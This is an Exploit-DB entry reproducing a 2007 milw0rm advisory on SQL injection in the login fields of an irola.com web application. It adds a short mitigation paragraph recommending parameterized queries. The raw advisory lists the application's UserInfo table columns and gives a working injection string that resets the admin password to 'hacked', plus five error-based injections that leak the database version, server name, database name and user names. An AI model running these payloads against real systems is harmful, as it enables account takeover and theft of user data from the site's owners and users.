Username/Password Fields SQL Injection

vendor:

by:

The-0utl4w

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Username/Password Fields SQL Injection

The username/password fields in the application allow SQL queries to be executed. An attacker can use this vulnerability to extract sensitive information from the database or modify data. In this case, an example exploit is provided to change the admin's password to 'hacked'. Additional SQL queries are also mentioned to gather more information from the database.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries or input validation to prevent SQL injection attacks. Additionally, access controls and least privilege principles should be implemented to limit the impact of a successful attack.

Source

Exploit-DB raw data:

Aria-Security Team
http://Aria-Security.Net
-----------------------------
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1106
Vendor: http://www.irola.com

Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:

UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone



Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--

these  may help the attacker to get more info:

1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--

Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w

# milw0rm.com [2007-11-23]